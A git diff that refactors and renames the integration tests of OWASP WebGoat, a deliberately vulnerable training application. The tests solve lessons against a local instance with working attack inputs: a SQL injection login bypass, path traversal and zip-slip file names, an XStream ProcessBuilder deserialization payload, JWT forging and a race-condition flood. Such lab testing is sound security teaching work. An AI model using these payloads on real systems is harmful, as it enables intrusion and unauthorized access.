+                        .get("find { it.username == \"" + this.getUser() + "\" }.flagsCaptured");
+        assertTrue(capturefFlags.contains("Admin lost password"));
+    }
+
+    @Test
+    public void testChallenge5() {
+        startLesson("Challenge5");
+
+        Map<String, Object> params = new HashMap<>();
+        params.clear();
+        params.put("username_login", "Larry");
+        params.put("password_login", "1' or '1'='1");
+
+        String result =
+                RestAssured.given()
+                        .when()
+                        .relaxedHTTPSValidation()
+                        .cookie("JSESSIONID", getWebGoatCookie())
+                        .formParams(params)
+                        .post(url("/WebGoat/challenge/5"))
+                        .then()
+                        .statusCode(200)
+                        .extract().asString();
+
+        String flag = result.substring(result.indexOf("flag") + 6, result.indexOf("flag") + 42);
+        params.clear();
+        params.put("flag", flag);
+        checkAssignment(url("/WebGoat/challenge/flag"), params, true);
+
+
+        checkResults("/challenge/5");
+
+        List<String> capturefFlags =
+                RestAssured.given()
+                        .when()
+                        .relaxedHTTPSValidation()
+                        .cookie("JSESSIONID", getWebGoatCookie())
+                        .get(url("/WebGoat/scoreboard-data"))
+                        .then()
+                        .statusCode(200)
+                        .extract().jsonPath()
+                        .get("find { it.username == \"" + this.getUser() + "\" }.flagsCaptured");
+        assertTrue(capturefFlags.contains("Without password"));
+    }
+
+}
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/CryptoTest.java b/src/it/java/org/owasp/webgoat/CryptoIntegrationTest.java
similarity index 95%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/CryptoTest.java
rename to src/it/java/org/owasp/webgoat/CryptoIntegrationTest.java
index ca2516be9..21caef469 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/CryptoTest.java
+++ b/src/it/java/org/owasp/webgoat/CryptoIntegrationTest.java
@@ -14,16 +14,16 @@ import java.util.Map;
 import javax.xml.bind.DatatypeConverter;
 
 import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.crypto.CryptoUtil;
-import org.owasp.webgoat.crypto.HashingAssignment;
+import org.owasp.webgoat.lessons.cryptography.CryptoUtil;
+import org.owasp.webgoat.lessons.cryptography.HashingAssignment;
 
 import io.restassured.RestAssured;
 
-public class CryptoTest extends IntegrationTest {
+public class CryptoIntegrationTest extends IntegrationTest {
 
 	@Test
 	public void runTests() {
-		startLesson("Crypto");
+		startLesson("Cryptography");
 
 		checkAssignment2();
 		checkAssignment3();
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/DeserializationTest.java b/src/it/java/org/owasp/webgoat/DeserializationIntegrationTest.java
similarity index 86%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/DeserializationTest.java
rename to src/it/java/org/owasp/webgoat/DeserializationIntegrationTest.java
index b133d05a2..496d6cfa8 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/DeserializationTest.java
+++ b/src/it/java/org/owasp/webgoat/DeserializationIntegrationTest.java
@@ -1,14 +1,14 @@
 package org.owasp.webgoat;
 
+import org.dummy.insecure.framework.VulnerableTaskHolder;
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.lessons.deserialization.SerializationHelper;
+
 import java.io.IOException;
 import java.util.HashMap;
 import java.util.Map;
 
-import org.dummy.insecure.framework.VulnerableTaskHolder;
-import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.deserialization.SerializationHelper;
-
-public class DeserializationTest extends IntegrationTest {
+public class DeserializationIntegrationTest extends IntegrationTest {
 
     private static String OS = System.getProperty("os.name").toLowerCase();
 
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/GeneralLessonTest.java b/src/it/java/org/owasp/webgoat/GeneralLessonIntegrationTest.java
similarity index 97%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/GeneralLessonTest.java
rename to src/it/java/org/owasp/webgoat/GeneralLessonIntegrationTest.java
index e96fba6b7..07c9d1dfd 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/GeneralLessonTest.java
+++ b/src/it/java/org/owasp/webgoat/GeneralLessonIntegrationTest.java
@@ -10,7 +10,7 @@ import java.util.HashMap;
 import java.util.Map;
 
 
-public class GeneralLessonTest extends IntegrationTest {
+public class GeneralLessonIntegrationTest extends IntegrationTest {
 
     @Test
     public void httpBasics() {
@@ -65,7 +65,7 @@ public class GeneralLessonTest extends IntegrationTest {
     @Test
     public void vulnerableComponents() {
     	String solution = "<contact class='dynamic-proxy'>\n" + 
-    			"<interface>org.owasp.webgoat.vulnerable_components.Contact</interface>\n" + 
+    			"<interface>org.owasp.webgoat.lessons.vulnerable_components.Contact</interface>\n" +
     			"  <handler class='java.beans.EventHandler'>\n" + 
     			"    <target class='java.lang.ProcessBuilder'>\n" + 
     			"      <command>\n" + 
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IDORTest.java b/src/it/java/org/owasp/webgoat/IDORIntegrationTest.java
similarity index 98%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/IDORTest.java
rename to src/it/java/org/owasp/webgoat/IDORIntegrationTest.java
index 817233b64..56308d92d 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IDORTest.java
+++ b/src/it/java/org/owasp/webgoat/IDORIntegrationTest.java
@@ -19,7 +19,7 @@ import io.restassured.RestAssured;
 import io.restassured.http.ContentType;
 import lombok.SneakyThrows;
 
-public class IDORTest extends IntegrationTest {
+public class IDORIntegrationTest extends IntegrationTest {
 	
 	@BeforeEach
     @SneakyThrows
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java b/src/it/java/org/owasp/webgoat/IntegrationTest.java
similarity index 61%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
rename to src/it/java/org/owasp/webgoat/IntegrationTest.java
index bc206583e..c04c9578d 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
+++ b/src/it/java/org/owasp/webgoat/IntegrationTest.java
@@ -3,99 +3,51 @@ package org.owasp.webgoat;
 import io.restassured.RestAssured;
 import io.restassured.http.ContentType;
 import lombok.Getter;
-import lombok.extern.slf4j.Slf4j;
 import org.hamcrest.CoreMatchers;
 import org.hamcrest.MatcherAssert;
 import org.junit.jupiter.api.AfterEach;
 import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.BeforeAll;
-import org.owasp.webwolf.WebWolf;
-import org.springframework.boot.builder.SpringApplicationBuilder;
 
-import java.io.IOException;
-import java.net.Socket;
 import java.util.Map;
-import java.util.UUID;
+import java.util.Objects;
 
 import static io.restassured.RestAssured.given;
 
-@Slf4j
 public abstract class IntegrationTest {
 
-    protected static int WG_PORT = 8080;
-    protected static int WW_PORT = 9090;
-    private static String WEBGOAT_HOSTNAME = "127.0.0.1";//"www.webgoat.local";
-    private static String WEBWOLF_HOSTNAME = "127.0.0.1";//"www.webwolf.local";
-    
-    /*
-     * To test docker compose/stack solution: 
-     * add localhost settings in hosts file: 127.0.0.1 www.webgoat.local www.webwolf.local
-     * Then set the above values to the specified host names and set the port to 80
-     */
-    
-    private static String WEBGOAT_HOSTHEADER = WEBGOAT_HOSTNAME +":"+WG_PORT;
-    private static String WEBWOLF_HOSTHEADER = WEBWOLF_HOSTNAME +":"+WW_PORT;
-    private static String WEBGOAT_URL = "http://" + WEBGOAT_HOSTHEADER + "/WebGoat/";
-    private static String WEBWOLF_URL = "http://" + WEBWOLF_HOSTHEADER + "/";
-    private static boolean WG_SSL = false;//enable this if you want to run the test on ssl
-
+    private static String webGoatPort = Objects.requireNonNull(System.getProperty("webgoatport"));
+    @Getter
+    private static String webWolfPort = Objects.requireNonNull(System.getProperty("webwolfport"));
+    private static boolean useSSL = false;
+    private static String webgoatUrl = (useSSL ? "https:" : "http:") + "//localhost:" + webGoatPort + "/WebGoat/";
+    private static String webWolfUrl = (useSSL ? "https:" : "http:") + "//localhost:" + webWolfPort + "/";
     @Getter
     private String webGoatCookie;
     @Getter
     private String webWolfCookie;
     @Getter
-    private String webgoatUser = UUID.randomUUID().toString();
-
-    private static boolean started = false;
-
-    @BeforeAll
-    public static void beforeAll() {
-        if (WG_SSL) {
-            WEBGOAT_URL = WEBGOAT_URL.replace("http:", "https:");
-        }
-        if (!started) {
-            started = true;
-            if (!isAlreadyRunning(WG_PORT)) {
-                SpringApplicationBuilder wgs = new SpringApplicationBuilder(StartWebGoat.class)
-                        .properties(Map.of("spring.config.name", "application-webgoat,application-inttest", "WEBGOAT_SSLENABLED", WG_SSL, "WEBGOAT_PORT", WG_PORT));
-                wgs.run();
-
-            }
-            if (!isAlreadyRunning(WW_PORT)) {
-                SpringApplicationBuilder wws = new SpringApplicationBuilder(WebWolf.class)
-                        .properties(Map.of("spring.config.name", "application-webwolf,application-inttest", "WEBWOLF_PORT", WW_PORT));
-                wws.run();
-            }
-        }
-    }
-
-    private static boolean isAlreadyRunning(int port) {
-        try (var ignored = new Socket("127.0.0.1", port)) {
-            return true;
-        } catch (IOException e) {
-            return false;
-        }
-    }
+    private String user = "webgoat";
 
     protected String url(String url) {
         url = url.replaceFirst("/WebGoat/", "");
         url = url.replaceFirst("/WebGoat", "");
         url = url.startsWith("/") ? url.replaceFirst("/", "") : url;
-        return WEBGOAT_URL + url;
+        return webgoatUrl + url;
     }
 
     protected String webWolfUrl(String url) {
+        url = url.replaceFirst("/WebWolf/", "");
+        url = url.replaceFirst("/WebWolf", "");
         url = url.startsWith("/") ? url.replaceFirst("/", "") : url;
-        return WEBWOLF_URL + url;
+        return webWolfUrl + url;
     }
 
     @BeforeEach
     public void login() {
-
         String location = given()
                 .when()
                 .relaxedHTTPSValidation()
-                .formParam("username", webgoatUser)
+                .formParam("username", user)
                 .formParam("password", "password")
                 .post(url("login")).then()
                 .cookie("JSESSIONID")
@@ -105,7 +57,7 @@ public abstract class IntegrationTest {
             webGoatCookie = RestAssured.given()
                     .when()
                     .relaxedHTTPSValidation()
-                    .formParam("username", webgoatUser)
+                    .formParam("username", user)
                     .formParam("password", "password")
                     .formParam("matchingPassword", "password")
                     .formParam("agree", "agree")
@@ -119,7 +71,7 @@ public abstract class IntegrationTest {
             webGoatCookie = given()
                     .when()
                     .relaxedHTTPSValidation()
-                    .formParam("username", webgoatUser)
+                    .formParam("username", user)
                     .formParam("password", "password")
                     .post(url("login")).then()
                     .cookie("JSESSIONID")
@@ -130,12 +82,12 @@ public abstract class IntegrationTest {
         webWolfCookie = RestAssured.given()
                 .when()
                 .relaxedHTTPSValidation()
-                .formParam("username", webgoatUser)
+                .formParam("username", user)
                 .formParam("password", "password")
-                .post(WEBWOLF_URL + "login")
+                .post(webWolfUrl("login"))
                 .then()
-                .cookie("WEBWOLFSESSION")
                 .statusCode(302)
+                .cookie("WEBWOLFSESSION")
                 .extract()
                 .cookie("WEBWOLFSESSION");
     }
@@ -150,15 +102,10 @@ public abstract class IntegrationTest {
                 .statusCode(200);
     }
 
-    /**
-     * At start of a lesson. The .lesson.lesson is visited and the lesson is reset.
-     *
-     * @param lessonName
-     */
     public void startLesson(String lessonName) {
-        startLesson(lessonName, true);
+        startLesson(lessonName, false);
     }
-    
+
     public void startLesson(String lessonName, boolean restart) {
         RestAssured.given()
                 .when()
@@ -169,25 +116,16 @@ public abstract class IntegrationTest {
                 .statusCode(200);
 
         if (restart) {
-        RestAssured.given()
-                .when()
-                .relaxedHTTPSValidation()
-                .cookie("JSESSIONID", getWebGoatCookie())
-                .get(url("service/restartlesson.mvc"))
-                .then()
-                .statusCode(200);
+            RestAssured.given()
+                    .when()
+                    .relaxedHTTPSValidation()
+                    .cookie("JSESSIONID", getWebGoatCookie())
+                    .get(url("service/restartlesson.mvc"))
+                    .then()
+                    .statusCode(200);
         }
     }
 
-    /**
-     * Helper method for most common type of test.
-     * POST with parameters.
-     * Checks for 200 and lessonCompleted as indicated by expectedResult
-     *
-     * @param url
-     * @param params
-     * @param expectedResult
-     */
     public void checkAssignment(String url, Map<String, ?> params, boolean expectedResult) {
         MatcherAssert.assertThat(
                 RestAssured.given()
@@ -201,17 +139,8 @@ public abstract class IntegrationTest {
                         .extract().path("lessonCompleted"), CoreMatchers.is(expectedResult));
     }
 
-    /**
-     * Helper method for most common type of test.
-     * PUT with parameters.
-     * Checks for 200 and lessonCompleted as indicated by expectedResult
-     *
-     * @param url
-     * @param params
-     * @param expectedResult
-     */
     public void checkAssignmentWithPUT(String url, Map<String, ?> params, boolean expectedResult) {
-    	MatcherAssert.assertThat(
+        MatcherAssert.assertThat(
                 RestAssured.given()
                         .when()
                         .relaxedHTTPSValidation()
@@ -245,12 +174,12 @@ public abstract class IntegrationTest {
                 .get(url("service/lessonoverview.mvc"))
                 .andReturn();
 
-    	MatcherAssert.assertThat(result.then()
+        MatcherAssert.assertThat(result.then()
                 .statusCode(200).extract().jsonPath().getList("solved"), CoreMatchers.everyItem(CoreMatchers.is(true)));
     }
 
     public void checkAssignment(String url, ContentType contentType, String body, boolean expectedResult) {
-    	MatcherAssert.assertThat(
+        MatcherAssert.assertThat(
                 RestAssured.given()
                         .when()
                         .relaxedHTTPSValidation()
@@ -264,8 +193,7 @@ public abstract class IntegrationTest {
     }
 
     public void checkAssignmentWithGet(String url, Map<String, ?> params, boolean expectedResult) {
-        log.info("Checking assignment for: {}", url);
-    	MatcherAssert.assertThat(
+        MatcherAssert.assertThat(
                 RestAssured.given()
                         .when()
                         .relaxedHTTPSValidation()
@@ -277,40 +205,26 @@ public abstract class IntegrationTest {
                         .extract().path("lessonCompleted"), CoreMatchers.is(expectedResult));
     }
 
-    public String getWebGoatServerPath() throws IOException {
-
-        //read path from server
-        String result = RestAssured.given()
-                .when()
-                .relaxedHTTPSValidation()
-                .cookie("JSESSIONID", getWebGoatCookie())
-                .get(url("/WebGoat/xxe/tmpdir"))
-                .then()
-                .extract().response().getBody().asString();
-        result = result.replace("%20", " ");
-        return result;
-    }
-
-    public String getWebWolfServerPath() throws IOException {
-
-        //read path from server
+    public String getWebWolfFileServerLocation() {
         String result = RestAssured.given()
                 .when()
                 .relaxedHTTPSValidation()
                 .cookie("WEBWOLFSESSION", getWebWolfCookie())
-                .get(webWolfUrl("/tmpdir"))
+                .get(webWolfUrl("/file-server-location"))
                 .then()
                 .extract().response().getBody().asString();
         result = result.replace("%20", " ");
         return result;
     }
-    
-    /**
-     * In order to facilitate tests with 
-     * @return
-     */
-    public String getWebWolfHostHeader() {
-    	return WEBWOLF_HOSTHEADER;
+
+    public String webGoatServerDirectory() {
+        return RestAssured.given()
+                .when()
+                .relaxedHTTPSValidation()
+                .cookie("JSESSIONID", getWebGoatCookie())
+                .get(url("/server-directory"))
+                .then()
+                .extract().response().getBody().asString();
     }
 
 }
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/JWTLessonTest.java b/src/it/java/org/owasp/webgoat/JWTLessonIntegrationTest.java
similarity index 98%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/JWTLessonTest.java
rename to src/it/java/org/owasp/webgoat/JWTLessonIntegrationTest.java
index 8913e4351..536eec117 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/JWTLessonTest.java
+++ b/src/it/java/org/owasp/webgoat/JWTLessonIntegrationTest.java
@@ -14,7 +14,6 @@ import java.util.Map;
 import org.hamcrest.CoreMatchers;
 import org.hamcrest.MatcherAssert;
 import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.jwt.JWTSecretKeyEndpoint;
 
 import com.fasterxml.jackson.databind.JsonNode;
 import com.fasterxml.jackson.databind.ObjectMapper;
@@ -28,12 +27,12 @@ import io.jsonwebtoken.Jwts;
 import io.jsonwebtoken.SignatureAlgorithm;
 import io.jsonwebtoken.impl.TextCodec;
 import io.restassured.RestAssured;
+import org.owasp.webgoat.lessons.jwt.JWTSecretKeyEndpoint;
 
-public class JWTLessonTest extends IntegrationTest {
+public class JWTLessonIntegrationTest extends IntegrationTest {
 	
     @Test
     public void solveAssignment() throws IOException, InvalidKeyException, NoSuchAlgorithmException {
-
     	startLesson("JWT");
 
     	decodingToken();
@@ -49,7 +48,6 @@ public class JWTLessonTest extends IntegrationTest {
 		quiz();
         
         checkResults("/JWT/");
-
     }
     
     private String generateToken(String key) {
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/PasswordResetLessonTest.java b/src/it/java/org/owasp/webgoat/PasswordResetLessonIntegrationTest.java
similarity index 87%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/PasswordResetLessonTest.java
rename to src/it/java/org/owasp/webgoat/PasswordResetLessonIntegrationTest.java
index 566de787f..6e030d039 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/PasswordResetLessonTest.java
+++ b/src/it/java/org/owasp/webgoat/PasswordResetLessonIntegrationTest.java
@@ -15,7 +15,7 @@ import static org.junit.jupiter.api.DynamicTest.dynamicTest;
 import java.util.Arrays;
 import java.util.Map;
 
-public class PasswordResetLessonTest extends IntegrationTest {
+public class PasswordResetLessonIntegrationTest extends IntegrationTest {
 
 	@BeforeEach
     @SneakyThrows
@@ -24,9 +24,9 @@ public class PasswordResetLessonTest extends IntegrationTest {
     }
 	
 	@TestFactory
-    Iterable<DynamicTest> testPathTraversal() {
+    Iterable<DynamicTest> passwordResetLesson() {
     	return Arrays.asList(
-    			dynamicTest("assignment 6 - check email link",()-> sendEmailShouldBeAvailabeInWebWolf()),
+    			dynamicTest("assignment 6 - check email link",()-> sendEmailShouldBeAvailableInWebWolf()),
     			dynamicTest("assignment 6 - solve assignment",()-> solveAssignment()),
     			dynamicTest("assignment 2 - simple reset",()-> assignment2()),
     			dynamicTest("assignment 4 - guess questions",()-> assignment4()),
@@ -34,18 +34,15 @@ public class PasswordResetLessonTest extends IntegrationTest {
     			);
     }
 	public void assignment2() {
-		
-		checkAssignment(url("PasswordReset/simple-mail/reset"), Map.of("emailReset", getWebgoatUser()+"@webgoat.org"), false);
-		checkAssignment(url("PasswordReset/simple-mail"), Map.of("email", getWebgoatUser()+"@webgoat.org", "password", StringUtils.reverse(getWebgoatUser())), true);
+		checkAssignment(url("PasswordReset/simple-mail/reset"), Map.of("emailReset", this.getUser()+"@webgoat.org"), false);
+		checkAssignment(url("PasswordReset/simple-mail"), Map.of("email", this.getUser()+"@webgoat.org", "password", StringUtils.reverse(this.getUser())), true);
 	}
 	
 	public void assignment4() {
-        
         checkAssignment(url("PasswordReset/questions"), Map.of("username", "tom", "securityQuestion", "purple"), true);
     }
 	
 	public void assignment5() {
-        
         checkAssignment(url("PasswordReset/SecurityQuestions"), Map.of("question", "What is your favorite animal?"), false);
         checkAssignment(url("PasswordReset/SecurityQuestions"), Map.of("question", "What is your favorite color?"), true);
     }
@@ -63,9 +60,8 @@ public class PasswordResetLessonTest extends IntegrationTest {
         checkAssignment(url("PasswordReset/reset/login"), Map.of("email", "tom@webgoat-cloud.org", "password", "123456"), true);
     }
 
-    public void sendEmailShouldBeAvailabeInWebWolf() {
-
-    	clickForgotEmailLink(getWebgoatUser() + "@webgoat.org");
+    public void sendEmailShouldBeAvailableInWebWolf() {
+    	clickForgotEmailLink(this.getUser() + "@webgoat.org");
 
         var responseBody = RestAssured.given()
                 .when()
@@ -100,7 +96,7 @@ public class PasswordResetLessonTest extends IntegrationTest {
                 .when()
                 .relaxedHTTPSValidation()
                 .cookie("WEBWOLFSESSION", getWebWolfCookie())
-                .get(webWolfUrl("WebWolf/requests"))
+                .get(webWolfUrl("/WebWolf/requests"))
                 .then()
                 .extract().response().getBody().asString();
         int startIndex = responseBody.lastIndexOf("/PasswordReset/reset/reset-password/");
@@ -111,7 +107,7 @@ public class PasswordResetLessonTest extends IntegrationTest {
     private void clickForgotEmailLink(String user) {
         RestAssured.given()
                 .when()
-                .header("host", getWebWolfHostHeader())
+                .header("host", String.format("%s:%s", "localhost", getWebWolfPort()))
                 .relaxedHTTPSValidation()
                 .cookie("JSESSIONID", getWebGoatCookie())
                 .formParams("email", user)
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/PathTraversalITTest.java b/src/it/java/org/owasp/webgoat/PathTraversalIntegrationTest.java
similarity index 88%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/PathTraversalITTest.java
rename to src/it/java/org/owasp/webgoat/PathTraversalIntegrationTest.java
index 753b193d3..3eb53ee8e 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/PathTraversalITTest.java
+++ b/src/it/java/org/owasp/webgoat/PathTraversalIntegrationTest.java
@@ -24,7 +24,7 @@ import java.util.zip.ZipOutputStream;
 
 import static org.junit.jupiter.api.DynamicTest.dynamicTest;
 
-class PathTraversalITTest extends IntegrationTest {
+class PathTraversalIT extends IntegrationTest {
 
     @TempDir
     Path tempDir;
@@ -58,7 +58,7 @@ class PathTraversalITTest extends IntegrationTest {
                         .cookie("JSESSIONID", getWebGoatCookie())
                         .multiPart("uploadedFile", "test.jpg", Files.readAllBytes(fileToUpload.toPath()))
                         .param("fullName", "../John Doe")
-                        .post("/WebGoat/PathTraversal/profile-upload")
+                        .post(url("/WebGoat/PathTraversal/profile-upload"))
                         .then()
                         .statusCode(200)
                         .extract().path("lessonCompleted"), CoreMatchers.is(true));
@@ -72,7 +72,7 @@ class PathTraversalITTest extends IntegrationTest {
                         .cookie("JSESSIONID", getWebGoatCookie())
                         .multiPart("uploadedFileFix", "test.jpg", Files.readAllBytes(fileToUpload.toPath()))
                         .param("fullNameFix", "..././John Doe")
-                        .post("/WebGoat/PathTraversal/profile-upload-fix")
+                        .post(url("/WebGoat/PathTraversal/profile-upload-fix"))
                         .then()
                         .statusCode(200)
                         .extract().path("lessonCompleted"), CoreMatchers.is(true));
@@ -85,7 +85,7 @@ class PathTraversalITTest extends IntegrationTest {
                         .relaxedHTTPSValidation()
                         .cookie("JSESSIONID", getWebGoatCookie())
                         .multiPart("uploadedFileRemoveUserInput", "../test.jpg", Files.readAllBytes(fileToUpload.toPath()))
-                        .post("/WebGoat/PathTraversal/profile-upload-remove-user-input")
+                        .post(url("/WebGoat/PathTraversal/profile-upload-remove-user-input"))
                         .then()
                         .statusCode(200)
                         .extract().path("lessonCompleted"), CoreMatchers.is(true));
@@ -97,22 +97,23 @@ class PathTraversalITTest extends IntegrationTest {
                 .when()
                 .relaxedHTTPSValidation()
                 .cookie("JSESSIONID", getWebGoatCookie())
-                .get(uri)
+                .get(url(uri))
                 .then()
                 .statusCode(200)
                 .body(CoreMatchers.is("You found it submit the SHA-512 hash of your username as answer"));
 
-        checkAssignment("/WebGoat/PathTraversal/random", Map.of("secret", Sha512DigestUtils.shaHex(getWebgoatUser())), true);
+        checkAssignment(url("/WebGoat/PathTraversal/random"), Map.of("secret",
+                Sha512DigestUtils.shaHex(this.getUser())), true);
     }
 
     private void assignment5() throws IOException {
-        var webGoatHome = System.getProperty("java.io.tmpdir") + "/webgoat/PathTraversal/" + getWebgoatUser();
+        var webGoatHome = webGoatServerDirectory() + "PathTraversal/" + this.getUser();
         webGoatHome = webGoatHome.replaceAll("^[a-zA-Z]:", ""); //Remove C: from the home directory on Windows
 
         var webGoatDirectory = new File(webGoatHome);
         var zipFile = new File(tempDir.toFile(), "upload.zip");
         try (var zos = new ZipOutputStream(new FileOutputStream(zipFile))) {
-            ZipEntry e = new ZipEntry("../../../../../../../../../../" + webGoatDirectory.toString() + "/image.jpg");
+            ZipEntry e = new ZipEntry("../../../../../../../../../../" + webGoatDirectory + "/image.jpg");
             zos.putNextEntry(e);
             zos.write("test".getBytes(StandardCharsets.UTF_8));
         }
@@ -122,11 +123,10 @@ class PathTraversalITTest extends IntegrationTest {
                         .relaxedHTTPSValidation()
                         .cookie("JSESSIONID", getWebGoatCookie())
                         .multiPart("uploadedFileZipSlip", "upload.zip", Files.readAllBytes(zipFile.toPath()))
-                        .post("/WebGoat/PathTraversal/zip-slip")
+                        .post(url("/WebGoat/PathTraversal/zip-slip"))
                         .then()
                         .statusCode(200)
                         .extract().path("lessonCompleted"), CoreMatchers.is(true));
-
     }
 
     @AfterEach
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/ProgressRaceConditionTest.java b/src/it/java/org/owasp/webgoat/ProgressRaceConditionIntegrationTest.java
similarity index 93%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/ProgressRaceConditionTest.java
rename to src/it/java/org/owasp/webgoat/ProgressRaceConditionIntegrationTest.java
index 518db8f3e..8b8b870ea 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/ProgressRaceConditionTest.java
+++ b/src/it/java/org/owasp/webgoat/ProgressRaceConditionIntegrationTest.java
@@ -2,7 +2,6 @@ package org.owasp.webgoat;
 
 import io.restassured.RestAssured;
 import io.restassured.response.Response;
-import lombok.extern.log4j.Log4j;
 
 import org.assertj.core.api.Assertions;
 import org.junit.jupiter.api.Test;
@@ -16,7 +15,7 @@ import java.util.concurrent.Executors;
 import java.util.stream.Collectors;
 import java.util.stream.IntStream;
 
-public class ProgressRaceConditionTest extends IntegrationTest {
+public class ProgressRaceConditionIntegrationTest extends IntegrationTest {
 
     @Test
     public void runTests() throws InterruptedException {
@@ -32,9 +31,9 @@ public class ProgressRaceConditionTest extends IntegrationTest {
                         .cookie("JSESSIONID", getWebGoatCookie())
                         .formParams(Map.of("flag", "test"))
                         .post(url("/challenge/flag/"));
-                
+
         };
-        ExecutorService executorService = Executors.newWorkStealingPool(NUMBER_OF_PARALLEL_THREADS); 
+        ExecutorService executorService = Executors.newWorkStealingPool(NUMBER_OF_PARALLEL_THREADS);
         List<? extends Callable<Response>> flagCalls = IntStream.range(0, NUMBER_OF_CALLS).mapToObj(i -> call).collect(Collectors.toList());
         var responses = executorService.invokeAll(flagCalls);
 
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SSRFTest.java b/src/it/java/org/owasp/webgoat/SSRFIntegrationTest.java
similarity index 91%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/SSRFTest.java
rename to src/it/java/org/owasp/webgoat/SSRFIntegrationTest.java
index 05efaab84..e59499108 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SSRFTest.java
+++ b/src/it/java/org/owasp/webgoat/SSRFIntegrationTest.java
@@ -6,7 +6,7 @@ import java.util.Map;
 
 import org.junit.jupiter.api.Test;
 
-public class SSRFTest extends IntegrationTest {
+public class SSRFIntegrationTest extends IntegrationTest {
     
     @Test
     public void runTests() throws IOException {
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SeleniumTest.java b/src/it/java/org/owasp/webgoat/SeleniumIntegrationTest.java
similarity index 88%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/SeleniumTest.java
rename to src/it/java/org/owasp/webgoat/SeleniumIntegrationTest.java
index b6a5c7ec9..beb3b71aa 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/SeleniumTest.java
+++ b/src/it/java/org/owasp/webgoat/SeleniumIntegrationTest.java
@@ -14,7 +14,7 @@ import org.openqa.selenium.firefox.FirefoxOptions;
 import io.github.bonigarcia.wdm.WebDriverManager;
 import io.github.bonigarcia.wdm.config.DriverManagerType;
 
-public class SeleniumTest extends IntegrationTest {
+public class SeleniumIntegrationTest extends IntegrationTest {
 
 	static {
 		try {
@@ -37,14 +37,14 @@ public class SeleniumTest extends IntegrationTest {
 			driver.get(url("/login"));
 			driver.manage().timeouts().implicitlyWait(30, TimeUnit.SECONDS);
 			// Login
-			driver.findElement(By.name("username")).sendKeys(getWebgoatUser());
+			driver.findElement(By.name("username")).sendKeys(this.getUser());
 			driver.findElement(By.name("password")).sendKeys("password");
 			driver.findElement(By.className("btn")).click();
 
 			// Check if user exists. If not, create user.
 			if (driver.getCurrentUrl().equals(url("/login?error"))) {
 				driver.get(url("/registration"));
-				driver.findElement(By.id("username")).sendKeys(getWebgoatUser());
+				driver.findElement(By.id("username")).sendKeys(this.getUser());
 				driver.findElement(By.id("password")).sendKeys("password");
 				driver.findElement(By.id("matchingPassword")).sendKeys("password");
 				driver.findElement(By.name("agree")).click();
@@ -73,27 +73,27 @@ public class SeleniumTest extends IntegrationTest {
 		driver.findElement(By.id("restart-lesson-button")).click();
 		driver.get(url("/start.mvc#lesson/SqlInjection.lesson/0"));
 		driver.get(url("/start.mvc#lesson/SqlInjection.lesson/1"));
-		driver.findElement(By.name("query")).sendKeys(SqlInjectionLessonTest.sql_2);
+		driver.findElement(By.name("query")).sendKeys(SqlInjectionLessonIntegrationTest.sql_2);
 		driver.findElement(By.name("query")).submit();
 
 		driver.get(url("/start.mvc#lesson/SqlInjection.lesson/2"));
-		driver.findElements(By.name("query")).get(1).sendKeys(SqlInjectionLessonTest.sql_3);
+		driver.findElements(By.name("query")).get(1).sendKeys(SqlInjectionLessonIntegrationTest.sql_3);
 		driver.findElements(By.name("query")).get(1).submit();
 
 		driver.get(url("/start.mvc#lesson/SqlInjection.lesson/3"));
-		driver.findElements(By.name("query")).get(2).sendKeys(SqlInjectionLessonTest.sql_4_drop);
+		driver.findElements(By.name("query")).get(2).sendKeys(SqlInjectionLessonIntegrationTest.sql_4_drop);
 		driver.findElements(By.name("query")).get(2).submit();
 
 		driver.get(url("/start.mvc#lesson/SqlInjection.lesson/3"));
 		driver.findElements(By.name("query")).get(2).clear();
-		driver.findElements(By.name("query")).get(2).sendKeys(SqlInjectionLessonTest.sql_4_add);
+		driver.findElements(By.name("query")).get(2).sendKeys(SqlInjectionLessonIntegrationTest.sql_4_add);
 		driver.findElements(By.name("query")).get(2).submit();
 		driver.findElements(By.name("query")).get(2).clear();
-		driver.findElements(By.name("query")).get(2).sendKeys(SqlInjectionLessonTest.sql_4_drop);
+		driver.findElements(By.name("query")).get(2).sendKeys(SqlInjectionLessonIntegrationTest.sql_4_drop);
 		driver.findElements(By.name("query")).get(2).submit();
